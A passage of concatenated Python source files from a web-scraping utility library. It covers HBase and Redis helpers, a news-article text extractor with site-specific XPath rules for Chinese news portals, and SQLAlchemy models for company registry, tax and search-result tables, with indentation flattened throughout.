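# Illustrative example: clean_dict({"a": "", "b": 0, "c": {"d": None, "e.x": 1}})
# -> {"b": 0, "c": {"e~x": 1}}: empty values are dropped (0 is kept) and dots in keys
# are rewritten to '~' before recursing.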
if __name__ == "__main__":
print(str_to_standard_time("2天前"))
```
#### File: XX/HBase/DMHelper.py
```python
import XX.Encrypt.EncryptHelper as Enc
def add_HBase(spider, url, html, project_name, conn, row=None):
table = conn.connection.table("crawl_" + project_name)
row = spider + "_" + Enc.Encrypt.md5(url) if not row else row
if table.row(row):
print("==Exists\t" + row)
return -1
data = {
"source:url": str(url),
"source:html": str(html),
"source:type": "html",
"source:size": str(len(html)),
}
conn.addRowColumn(row, data, table=table)
return 1
```
#### File: XX/HTML/html_to_article.py
```python
import re
import traceback
import XX.funclib as cfun
from lxml import etree
from scrapy import Selector
class GetNewsArticle(object):
def __init__(self, unicode_url='', unicode_html='', *args, **kwargs):
self.url = unicode_url
if type(unicode_html) == str:
self.html = unicode_html
else:
self.html = unicode_html
if self.url is '' or self.html is '':
raise ValueError('url or html is null ')
self.article_content = ''
def __by_xpath(self):
try:
tree = etree.HTML(self.html)
except:
tree = etree.HTML(self.html.encode("utf-8"))
# for 腾讯新闻
if 'qq.com' in self.url:
for i in tree.xpath('//div[@id="Cnt-Main-Article-QQ"]//p//text()'):
self.article_content += i
# for 今日头条新闻
elif 'toutiao.com' in self.url:
for i in tree.xpath('//div[@class="article-content"]//text()'):
self.article_content += i
# for 新浪新闻
elif 'sina.com.cn' in self.url:
for i in tree.xpath('//div[@id="artibody" or @id="articleContent" or @id="j_articleContent"]//p//text()'):
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
if not self.article_content:
# ??
for i in tree.xpath('//div[@id="artibody" or @id="articleContent" or @id="j_articleContent"]//p'):
self.article_content = self.article_content + cfun.clean_str_label(i.xpath("string(.)")) + '\n'
# for 搜狐新闻
elif 'sohu.com' in self.url:
for i in tree.xpath('//div[@id="contentText"]//text()'):
self.article_content += i
# for 网易新闻
elif '163.com' in self.url:
for i in tree.xpath('//div[@id="endText"]//text()'):
self.article_content += i
# for 汽车之家新闻
elif 'autohome.com.cn' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@id="articleContent" or @class="dealertext" or @id="newsbody"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 车质网新闻
elif '12365auto.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="show" or @class="sp_new_show"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 易车网新闻
elif 'bitauto.com' in self.url or 'yiche.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="text_box" or @id="openimg_articlecontent"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 一点资讯
elif 'yidianzixun.com' in self.url:
for i in Selector(text=self.html).xpath('//div[@id="imedia-article" or @class="content-bd"]//p//text()'):
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 太平洋汽车
elif 'pcauto.com.cn' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="artText clearfix" or @class="artText"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 爱卡汽车 newsbody
elif 'xcar.com.cn' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@id="newsbody" or @class="artical_player_wrap"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 车讯网
elif 'chexun.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="news-editbox"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 买车网
elif 'maiche.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="content-left"]//div[@class="detail"]//p//text()'):
if i:
self.article_content = self.article_content + cfun.clean_str_label(str(i)) + '\n'
# for 凤凰网
elif 'ifeng.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="arl-c-txt"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
else:
self.article_content = ''
self.article_content = cfun.clean_str_label(self.article_content)
if len(self.article_content) < 2:
return False
else:
return True
def __run(self):
if not self.__by_xpath():
ex = htmltoarticle(html=self.html)
self.article_content = ex.get_ariticle()
def get_article(self):
try:
self.__run()
except:
traceback.print_exc()
self.article_content = ''
if len(self.article_content) < 2:
return ""
else:
return self.article_content
class htmltoarticle(object):
def __init__(self, *args, **kwargs):
self.html = kwargs.pop('html', '')
if self.html is '':
raise ValueError('html is null ')
self.lines = []
self.block = []
self.threshold_value = 172
# Strip doctype, comments, scripts, styles, HTML entities and remaining tags
def __removeLabel(self):
re_doctype = re.compile(r'(?is)<!DOCTYPE.*?>', re.S)
self.html = re_doctype.sub('', self.html)
re_comment = re.compile(r'(?is)<!--.*?-->', re.S)
self.html = re_comment.sub('', self.html)
re_javascript = re.compile(r'(?is)<script.*?>.*?</script>', re.S)
self.html = re_javascript.sub('', self.html)
re_css = re.compile(r'(?is)<style.*?>.*?</style>', re.S)
self.html = re_css.sub('', self.html)
re_special_char = re.compile(r'&.{2,5};|&#.{2,5};', re.S)
self.html = re_special_char.sub('', self.html)
re_other_tag = re.compile(r'(?is)<.*?>', re.S)
self.html = re_other_tag.sub('', self.html)
re_empty_char = re.compile(r'\\s', re.S)
self.html = re_empty_char.sub('', self.html)
# Remove all whitespace from a string
def __removeSpace(self, target_str):
return "".join(target_str.split())
# Split the HTML into lines and strip whitespace from each line
def __statistic_line(self):
for line in self.html.splitlines(False):
line = self.__removeSpace(line)
self.lines.append(line)
# For each line, record the total character count of the block of `blockwidth` consecutive lines starting there
def __statistic_block(self, blockwidth):
i = 0
while i < len(self.lines) - blockwidth:
block_len = 0
j = 0
while j < blockwidth:
block_len += len(self.lines[i + j])
j += 1
self.block.append(block_len)
i += 1
# Find the first block whose character count exceeds the threshold and is followed by non-empty lines (the likely start of the article body)
def __find_Surge(self, start, threshold):
i = start
while i < len(self.block):
if self.block[i] > threshold and self.block[i + 1] > 0 and self.block[i + 2] > 0 and self.block[i + 3] > 0:
return i
i += 1
return -1
def __find_Dive(self, surgePoint):
i = surgePoint + 1
while i < len(self.block):
if self.block[i] == 0 and self.block[i + 1] == 0:
return i
i += 1
return len(self.block) - 1
def __run(self):
start = 0
end = 0
article_content = ''
while True:
start = self.__find_Surge(end, self.threshold_value)
if start < 0:
break
end = self.__find_Dive(start)
for i in range(start, end + 1):
article_content += self.lines[i]
article_content += '\n'
return article_content
def get_ariticle(self):
self.__removeLabel()
self.__statistic_line()
self.__statistic_block(3)
return self.__run()
if __name__ == '__main__':
import XX.HTTP.RequestsHelper as creq
url = "http://www.chexun.com/2018-04-20/105255634.html"
r = creq.RequestHelper.SendCacheRequest(url)
if r.status_code == 200:
ex = GetNewsArticle(unicode_url=url, unicode_html=r.text)
print(ex.get_article())
# ex = htmltoarticle(html=r.text)
# print ex.get_ariticle()
```
#### File: HTML/Parse/NewsParse.py
```python
from newspaper import Article
class NewsParse:
def __init__(self, **kw):
self.html = kw.get("html")
self.url = kw.get("url")
def getNewsItem(self, **kw):
data = dict()
html = self.html if self.html else kw.get("html")
doc = Article(kw.get("url", "-"), language="zh")
doc.download(input_html=html)
doc.parse()
data["url"] = doc.url
data["title"] = doc.title
data["content"] = doc.text
data["date"] = str(doc.publish_date)
return data
if __name__ == '__main__':
from pprint import pprint
# html = """</div>2018-09-18 13:35:03 <a href='http://look.huanqiu.com/article/2018-09/13041797.html' target='_blank'>环球网</a> <span class="chan_newsInfo_comment"><a href="#comment">参与评论(<em id="top_comment_number"></em>)人</a></span>"""
html = open("a.html", encoding="utf-8").read()
pprint(NewsParse.getNewsItem(NewsParse(), html=html))
```
#### File: XX/HTML/UrlInfoHelper.py
```python
import json
import XX.File.FileHelper as cf
class UrlInfoHelper(object):
# Push url_info to redis as a JSON string; record problematic urls and delete their cache files
@staticmethod
def add2redis(url_info, redis_key, redis_conn, del_cache=0, spider="", getUrlCachePath=None, uniqueUrl=None):
try:
redis_conn.rpush(redis_key, json.dumps(url_info))
except:
print("==UrlInfoHelper->Add redis is wrong")
if del_cache:
cache_fp = getUrlCachePath(uniqueUrl(url_info.get("url")), spider=spider)
if cf.FileHelper.is_file_exit(cache_fp):
print("Remove cache file + " + cache_fp + "\t url is " + url_info.get("url"))
cf.FileHelper.remove_file(cache_fp)
else:
print("=====Cache is not exists========" + cache_fp)
else:
print("--" * 50, flush=True)
if __name__ == '__main__':
pass
```
#### File: Model/Object/ResponseJson.py
```python
import json
# Wrapper for the response JSON structure produced on the server side
class ResponseJson(object):
data = None
code = 0
msg = ""
def __init__(self, data=None, code=0, msg="", status="ok", *arg, **kw):
self.data = data
self.code = code
self.msg = msg
@staticmethod
def get_response_json(data=None, code=0, msg="", resformat="dict", status="ok", *arg, **kw):
if not msg:
if code == 0:
msg = "ok"
else:
msg = "err"
response_json = {"data": data, "code": code, "msg": msg}
if resformat == "dict":
return response_json
elif resformat == "str":
return json.dumps(response_json, ensure_ascii=False)
else:
return response_json
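# Illustrative example:
#   ResponseJson.get_response_json(data={"id": 1}, resformat="str")
#   -> '{"data": {"id": 1}, "code": 0, "msg": "ok"}'
# With the default resformat="dict" the same payload is returned as a plain dict.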
if __name__ == "__main__":
res = ResponseJson()
print(res.__dict__)
pass
```
#### File: SqlAlchemy/Company/ComBasic1Model.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class ComBasic1Model(Base, BaseModel):
__tablename__ = 'com_basic1'
id = Column(Integer, primary_key=True)
web_id = Column(String(255), unique=True)
batchid = Column(String(255))
oaddress = Column(String(255))
orpt_name = Column(String(255))
oname = Column(String(255))
regcode = Column(String(255), index=True)
uccode = Column(String(255), index=True)
etcode = Column(String(255))
max_score = Column(String(255))
is_del = Column(Integer)
c_ts = Column(Integer)
u_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.batchid = kw.get("batchid", None)
self.c_ts = kw.get("c_ts", None)
self.etcode = kw.get("etcode", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.max_score = kw.get("max_score", None)
self.metadata = kw.get("metadata", None)
self.oaddress = kw.get("oaddress", None)
self.oname = kw.get("oname", None)
self.orpt_name = kw.get("orpt_name", None)
self.regcode = kw.get("regcode", None)
self.u_ts = kw.get("u_ts", None)
self.uccode = kw.get("uccode", None)
self.web_id = kw.get("web_id", None)
if __name__ == '__main__':
createInitFunction(ComBasic1Model)
```
#### File: SqlAlchemy/Company/CompanyInfoModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, String, Text
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyInfoModel(Base, BaseModel):
__tablename__ = 'company_info'
id = Column(Integer, primary_key=True)
com_id = Column(Integer, index=True)
web_key = Column(String(255, 'utf8mb4_unicode_ci'))
logo = Column(String(255, 'utf8mb4_unicode_ci'))
name = Column(String(255, 'utf8mb4_unicode_ci'))
tel = Column(String(255, 'utf8mb4_unicode_ci'))
email = Column(String(255, 'utf8mb4_unicode_ci'))
web_url = Column(String(255, 'utf8mb4_unicode_ci'))
Address = Column(String(255, 'utf8mb4_unicode_ci'))
AnnualReports = Column(String(255, 'utf8mb4_unicode_ci'))
CreditCode = Column(String(255, 'utf8mb4_unicode_ci'))
taxpayer_no = Column(String(255, 'utf8mb4_unicode_ci'))
No = Column(String(255, 'utf8mb4_unicode_ci'))
organization_no = Column(String(255, 'utf8mb4_unicode_ci'))
Oper_id = Column(Integer)
OperName = Column(String(255, 'utf8mb4_unicode_ci'))
RegistCapi = Column(String(255, 'utf8mb4_unicode_ci'))
Status = Column(String(255, 'utf8mb4_unicode_ci'))
StartDate = Column(String(255, 'utf8mb4_unicode_ci'))
EconKind = Column(String(255, 'utf8mb4_unicode_ci'))
staff_num = Column(String(255, 'utf8mb4_unicode_ci'))
TermStart = Column(String(255, 'utf8mb4_unicode_ci'))
TeamEnd = Column(String(255, 'utf8mb4_unicode_ci'))
BelongOrg = Column(String(255, 'utf8mb4_unicode_ci'))
CheckDate = Column(String(255, 'utf8mb4_unicode_ci'))
en_name = Column(String(255, 'utf8mb4_unicode_ci'))
register_addr = Column(String(255, 'utf8mb4_unicode_ci'))
industry_belong = Column(String(255, 'utf8mb4_unicode_ci'))
used_name = Column(String(255, 'utf8mb4_unicode_ci'))
location = Column(String(255, 'utf8mb4_unicode_ci'))
Scope = Column(Text(collation='utf8mb4_unicode_ci'))
intro = Column(Text(collation='utf8mb4_unicode_ci'))
EndDate = Column(String(255, 'utf8mb4_unicode_ci'))
Province = Column(String(50, 'utf8mb4_unicode_ci'))
Industry = Column(String(255, 'utf8mb4_unicode_ci'))
ImageUrl = Column(String(255, 'utf8mb4_unicode_ci'))
OrgNo = Column(String(255, 'utf8mb4_unicode_ci'))
EnglishName = Column(String(255, 'utf8mb4_unicode_ci'))
Type = Column(String(255, 'utf8mb4_unicode_ci'))
Tag = Column(String(255, 'utf8mb4_unicode_ci'))
Financing = Column(String(255, 'utf8mb4_unicode_ci'))
DbUpdatedDate = Column(Integer)
ShortStatus = Column(String(20, 'utf8mb4_unicode_ci'))
IsExpired = Column(String(5, 'utf8mb4_unicode_ci'))
DUNSNo = Column(String(25, 'utf8mb4_unicode_ci'))
TaxNo = Column(String(25, 'utf8mb4_unicode_ci'))
CbuItem = Column(Text(collation='utf8mb4_unicode_ci'))
AbuItem = Column(Text(collation='utf8mb4_unicode_ci'))
OpForm = Column(String(5, 'utf8mb4_unicode_ci'))
RecCap = Column(String(55, 'utf8mb4_unicode_ci'))
Liquidation = Column(String(5, 'utf8mb4_unicode_ci'))
SimpleCancellation = Column(String(5, 'utf8mb4_unicode_ci'))
CompanyStatus = Column(Integer)
HoldingType = Column(String(25, 'utf8mb4_unicode_ci'))
id_del = Column(String(255, 'utf8mb4_unicode_ci'))
create_ts = Column(Integer)
update_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.AbuItem = kw.get("AbuItem", None)
self.Address = kw.get("Address", None)
self.AnnualReports = kw.get("AnnualReports", None)
self.BelongOrg = kw.get("BelongOrg", None)
self.CbuItem = kw.get("CbuItem", None)
self.CheckDate = kw.get("CheckDate", None)
self.CompanyStatus = kw.get("CompanyStatus", None)
self.CreditCode = kw.get("CreditCode", None)
self.DUNSNo = kw.get("DUNSNo", None)
self.DbUpdatedDate = kw.get("DbUpdatedDate", None)
self.EconKind = kw.get("EconKind", None)
self.EndDate = kw.get("EndDate", None)
self.EnglishName = kw.get("EnglishName", None)
self.Financing = kw.get("Financing", None)
self.HoldingType = kw.get("HoldingType", None)
self.ImageUrl = kw.get("ImageUrl", None)
self.Industry = kw.get("Industry", None)
self.IsExpired = kw.get("IsExpired", None)
self.Liquidation = kw.get("Liquidation", None)
self.No = kw.get("No", None)
self.OpForm = kw.get("OpForm", None)
self.Oper_id = kw.get("Oper_id", None)
self.OperName = kw.get("OperName", None)
self.OrgNo = kw.get("OrgNo", None)
self.Province = kw.get("Province", None)
self.RecCap = kw.get("RecCap", None)
self.RegistCapi = kw.get("RegistCapi", None)
self.Scope = kw.get("Scope", None)
self.ShortStatus = kw.get("ShortStatus", None)
self.SimpleCancellation = kw.get("SimpleCancellation", None)
self.StartDate = kw.get("StartDate", None)
self.Status = kw.get("Status", None)
self.Tag = kw.get("Tag", None)
self.TaxNo = kw.get("TaxNo", None)
self.TeamEnd = kw.get("TeamEnd", None)
self.TermStart = kw.get("TermStart", None)
self.Type = kw.get("Type", None)
self.com_id = kw.get("com_id", None)
self.web_key = kw.get("web_key", None)
self.create_ts = kw.get("create_ts", None)
self.email = kw.get("email", None)
self.en_name = kw.get("en_name", None)
self.get = kw.get("get", None)
self.getAll = kw.get("getAll", None)
self.getAllIds = kw.get("getAllIds", None)
self.getByFromId = kw.get("getByFromId", None)
self.getByFromIdAndMod = kw.get("getByFromIdAndMod", None)
self.getByName = kw.get("getByName", None)
self.getColumsByFromIdAndMod = kw.get("getColumsByFromIdAndMod", None)
self.id = kw.get("id", None)
self.id_del = kw.get("id_del", None)
self.industry_belong = kw.get("industry_belong", None)
self.intro = kw.get("intro", None)
self.location = kw.get("location", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.organization_no = kw.get("organization_no", None)
self.register_addr = kw.get("register_addr", None)
self.staff_num = kw.get("staff_num", None)
self.taxpayer_no = kw.get("taxpayer_no", None)
self.tel = kw.get("tel", None)
self.updateId = kw.get("updateId", None)
self.update_ts = kw.get("update_ts", None)
self.used_name = kw.get("used_name", None)
self.web_url = kw.get("web_url", None)
if __name__ == '__main__':
createInitFunction(CompanyInfoModel)
```
#### File: SqlAlchemy/Company/CompanyInverst.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, String
from sqlalchemy.dialects.mysql import INTEGER
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyInvest(Base, BaseModel):
__tablename__ = 'company_invest'
id = Column(INTEGER(11), primary_key=True)
invest_id = Column(INTEGER(11))
invest_to_id = Column(INTEGER(11))
CompanyCode = Column(String(255))
Percent = Column(String(255))
PercentTotal = Column(String(255))
Level = Column(INTEGER(11))
Org = Column(INTEGER(11))
ShouldCapi = Column(String(255))
StockRightNum = Column(String(255))
DetailCount = Column(INTEGER(11))
DetailList = Column(String(255))
ShortStatus = Column(String(255))
is_del = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
update_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.CompanyCode = kw.get("CompanyCode", None)
self.DetailCount = kw.get("DetailCount", None)
self.DetailList = kw.get("DetailList", None)
self.Level = kw.get("Level", None)
self.Org = kw.get("Org", None)
self.Percent = kw.get("Percent", None)
self.PercentTotal = kw.get("PercentTotal", None)
self.ShortStatus = kw.get("ShortStatus", None)
self.ShouldCapi = kw.get("ShouldCapi", None)
self.StockRightNum = kw.get("StockRightNum", None)
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.invest_id = kw.get("invest_id", None)
self.invest_to_id = kw.get("invest_to_id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.update_ts = kw.get("update_ts", None)
def getInvestRelation(self, invest_id, invest_to_id, session):
return session.query(CompanyInvest.id).filter(CompanyInvest.invest_id == invest_id, CompanyInvest.invest_to_id == invest_to_id).limit(1).all()
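# Illustrative usage (assumes a SQLAlchemy session created elsewhere, e.g. sessionmaker(bind=engine)()):
#   rows = CompanyInvest().getInvestRelation(invest_id=1, invest_to_id=2, session=session)
#   already_linked = bool(rows)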
if __name__ == '__main__':
createInitFunction(CompanyInvest)
```
#### File: SqlAlchemy/Company/CompanyTaxModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, String, Text, func
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyTaxModel(Base, BaseModel):
__tablename__ = 'company_tax'
id = Column(Integer, primary_key=True)
com_id = Column(Integer)
web_key = Column(String(50))
Name = Column(String(255))
CreditCode = Column(String(255))
Address = Column(String(255))
PhoneNumber = Column(String(255))
Bank = Column(String(255))
Bankaccount = Column(String(255))
is_del = Column(Integer)
create_ts = Column(Integer)
update_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.Address = kw.get("Address", None)
self.Bank = kw.get("Bank", None)
self.Bankaccount = kw.get("Bankaccount", None)
self.CreditCode = kw.get("CreditCode", None)
self.Name = kw.get("Name", None)
self.PhoneNumber = kw.get("PhoneNumber", None)
self.com_id = kw.get("com_id", None)
self.web_key = kw.get("web_key", None)
self.create_ts = kw.get("create_ts", None)
self.get = kw.get("get", None)
self.getAll = kw.get("getAll", None)
self.getAllIds = kw.get("getAllIds", None)
self.getByFromId = kw.get("getByFromId", None)
self.getByFromIdAndMod = kw.get("getByFromIdAndMod", None)
self.getByName = kw.get("getByName", None)
self.getColumsByFromIdAndMod = kw.get("getColumsByFromIdAndMod", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.updateId = kw.get("updateId", None)
self.update_ts = kw.get("update_ts", None)
if __name__ == '__main__':
createInitFunction(CompanyTaxModel)
```
#### File: SqlAlchemy/Company/CompanyTyc.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, Index, String
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class CompanyTyc(Base, BaseModel):
__tablename__ = 'company_tyc'
__table_args__ = (
Index('wy', 'no', 'creditno', unique=True),
)
id = Column(Integer, primary_key=True)
web_id = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
name = Column(String(255, 'utf8mb4_unicode_ci'))
no = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
creditno = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
is_del = Column(Integer)
u_ts = Column(Integer)
c_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.c_ts = kw.get("c_ts", None)
self.creditno = kw.get("creditno", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.no = kw.get("no", None)
self.u_ts = kw.get("u_ts", None)
self.web_id = kw.get("web_id", None)
if __name__ == '__main__':
createInitFunction(CompanyTyc)
```
#### File: SqlAlchemy/Company/InfoModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Integer, Index, TEXT, VARCHAR, text
from sqlalchemy.dialects.mysql.types import TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class Info12315(Base, BaseModel):
__tablename__ = 'info12315'
__table_args__ = (
Index('wy', 'NBXH', 'REGNO', unique=True),
Index('REGNO', 'REGNO', 'NBXH')
)
id = Column(Integer, primary_key=True)
ADDR = Column(VARCHAR(255))
ANADDR = Column(VARCHAR(255))
ENTTYPE = Column(VARCHAR(255))
ENTTYPENAME = Column(VARCHAR(255))
HIGHLIGHTTITLE = Column(VARCHAR(255))
INVOPT = Column(VARCHAR(255))
JYFW = Column(TEXT)
NBXH = Column(VARCHAR(80))
PRIPID = Column(VARCHAR(255))
QYBM = Column(VARCHAR(255))
QYWZ = Column(VARCHAR(255))
REGNO = Column(VARCHAR(80))
REGSTATECODE = Column(VARCHAR(255))
REGSTATE_CN = Column(VARCHAR(255))
REGUNIT = Column(VARCHAR(255))
REGUNITNAME = Column(VARCHAR(255))
SQ = Column(VARCHAR(255))
S_EXT_NODENUM = Column(VARCHAR(255))
TEL = Column(VARCHAR(255))
UBINDTYPE = Column(VARCHAR(255))
UBINDTYPENAME = Column(VARCHAR(255))
UNITCODE = Column(VARCHAR(255))
UNITNAME = Column(VARCHAR(255))
XZQHBM = Column(VARCHAR(255))
is_del = Column(Integer)
u_ts = Column(Integer)
c_ts = Column(Integer)
crawl_detail = Column(TINYINT(4), server_default=text("'0'"))
def __init__(self, *arg, **kw):
self.ADDR = kw.get("ADDR", None)
self.ANADDR = kw.get("ANADDR", None)
self.ENTTYPE = kw.get("ENTTYPE", None)
self.ENTTYPENAME = kw.get("ENTTYPENAME", None)
self.HIGHLIGHTTITLE = kw.get("HIGHLIGHTTITLE", None)
self.INVOPT = kw.get("INVOPT", None)
self.JYFW = kw.get("JYFW", None)
self.NBXH = kw.get("NBXH", None)
self.PRIPID = kw.get("PRIPID", None)
self.QYBM = kw.get("QYBM", None)
self.QYWZ = kw.get("QYWZ", None)
self.REGNO = kw.get("REGNO", None)
self.REGSTATECODE = kw.get("REGSTATECODE", None)
self.REGSTATE_CN = kw.get("REGSTATE_CN", None)
self.REGUNIT = kw.get("REGUNIT", None)
self.REGUNITNAME = kw.get("REGUNITNAME", None)
self.SQ = kw.get("SQ", None)
self.S_EXT_NODENUM = kw.get("S_EXT_NODENUM", None)
self.TEL = kw.get("TEL", None)
self.UBINDTYPE = kw.get("UBINDTYPE", None)
self.UBINDTYPENAME = kw.get("UBINDTYPENAME", None)
self.UNITCODE = kw.get("UNITCODE", None)
self.UNITNAME = kw.get("UNITNAME", None)
self.XZQHBM = kw.get("XZQHBM", None)
self.c_ts = kw.get("c_ts", None)
self.crawl_detail = kw.get("crawl_detail", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.u_ts = kw.get("u_ts", None)
if __name__ == '__main__':
createInitFunction(Info12315)
```
#### File: Model/SqlAlchemy/SaaSModel.py
```python
from BaseModel.BaseModel import *
from sqlalchemy import Column, String, TIMESTAMP, Text, text, DateTime
from sqlalchemy.dialects.mysql import INTEGER, LONGTEXT, TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class BaiduAdvertisement(Base, BaseModel):
__tablename__ = 'baidu_advertisement'
id = Column(INTEGER(11), primary_key=True)
url = Column(String(255))
real_url = Column(String(255))
snapshot_url = Column(String(255))
title = Column(String(255))
is_del = Column(INTEGER(11), server_default=text("'0'"))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.real_url = kw.get("real_url", None)
self.snapshot_url = kw.get("snapshot_url", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class BaiduSearchResult(Base, BaseModel):
__tablename__ = 'wp_saas_baidu_search_result'
id = Column(INTEGER(11), primary_key=True)
platform = Column(String(255))
keyword = Column(String(255))
crawl_time = Column(INTEGER(11))
url = Column(String(255))
real_url = Column(String(255), unique=True)
source_url = Column(String(255))
title = Column(String(255))
spider = Column(String(60))
skip_url = Column(Text)
snapshot_url = Column(Text)
show_url = Column(Text)
is_ad = Column(TINYINT(1))
content = Column(String(255))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.content = kw.get("content", None)
self.crawl_time = kw.get("crawl_time", None)
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_ad = kw.get("is_ad", None)
self.is_del = kw.get("is_del", None)
self.keyword = kw.get("keyword", None)
self.metadata = kw.get("metadata", None)
self.platform = kw.get("platform", None)
self.real_url = kw.get("real_url", None)
self.show_url = kw.get("show_url", None)
self.skip_url = kw.get("skip_url", None)
self.snapshot_url = kw.get("snapshot_url", None)
self.source_url = kw.get("source_url", None)
self.spider = kw.get("spider", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class Company(Base, BaseModel):
__tablename__ = 'wp_saas_company'
id = Column(INTEGER(11), primary_key=True)
ADDR = Column(String(255, 'utf8mb4_unicode_ci'))
ANADDR = Column(String(255, 'utf8mb4_unicode_ci'))
ENTTYPE = Column(String(255, 'utf8mb4_unicode_ci'))
ENTTYPENAME = Column(String(255, 'utf8mb4_unicode_ci'))
HIGHLIGHTTITLE = Column(String(255, 'utf8mb4_unicode_ci'))
INVOPT = Column(String(255, 'utf8mb4_unicode_ci'))
JYFW = Column(Text(collation='utf8mb4_unicode_ci'))
NBXH = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
PRIPID = Column(String(255, 'utf8mb4_unicode_ci'))
QYBM = Column(String(255, 'utf8mb4_unicode_ci'))
QYWZ = Column(String(255, 'utf8mb4_unicode_ci'))
REGNO = Column(String(80, 'utf8mb4_unicode_ci'), index=True)
REGSTATECODE = Column(String(255, 'utf8mb4_unicode_ci'))
REGSTATE_CN = Column(String(255, 'utf8mb4_unicode_ci'))
REGUNIT = Column(String(255, 'utf8mb4_unicode_ci'))
REGUNITNAME = Column(String(255, 'utf8mb4_unicode_ci'))
SQ = Column(String(255, 'utf8mb4_unicode_ci'))
S_EXT_NODENUM = Column(String(255, 'utf8mb4_unicode_ci'))
TEL = Column(String(255, 'utf8mb4_unicode_ci'))
UBINDTYPE = Column(String(255, 'utf8mb4_unicode_ci'))
UBINDTYPENAME = Column(String(255, 'utf8mb4_unicode_ci'))
UNITCODE = Column(String(255, 'utf8mb4_unicode_ci'))
UNITNAME = Column(String(255, 'utf8mb4_unicode_ci'))
XZQHBM = Column(String(255, 'utf8mb4_unicode_ci'))
reg_time = Column(DateTime)
is_del = Column(INTEGER(11))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.ADDR = kw.get("ADDR", None)
self.ANADDR = kw.get("ANADDR", None)
self.ENTTYPE = kw.get("ENTTYPE", None)
self.ENTTYPENAME = kw.get("ENTTYPENAME", None)
self.HIGHLIGHTTITLE = kw.get("HIGHLIGHTTITLE", None)
self.INVOPT = kw.get("INVOPT", None)
self.JYFW = kw.get("JYFW", None)
self.NBXH = kw.get("NBXH", None)
self.PRIPID = kw.get("PRIPID", None)
self.QYBM = kw.get("QYBM", None)
self.QYWZ = kw.get("QYWZ", None)
self.REGNO = kw.get("REGNO", None)
self.REGSTATECODE = kw.get("REGSTATECODE", None)
self.REGSTATE_CN = kw.get("REGSTATE_CN", None)
self.REGUNIT = kw.get("REGUNIT", None)
self.REGUNITNAME = kw.get("REGUNITNAME", None)
self.SQ = kw.get("SQ", None)
self.S_EXT_NODENUM = kw.get("S_EXT_NODENUM", None)
self.TEL = kw.get("TEL", None)
self.UBINDTYPE = kw.get("UBINDTYPE", None)
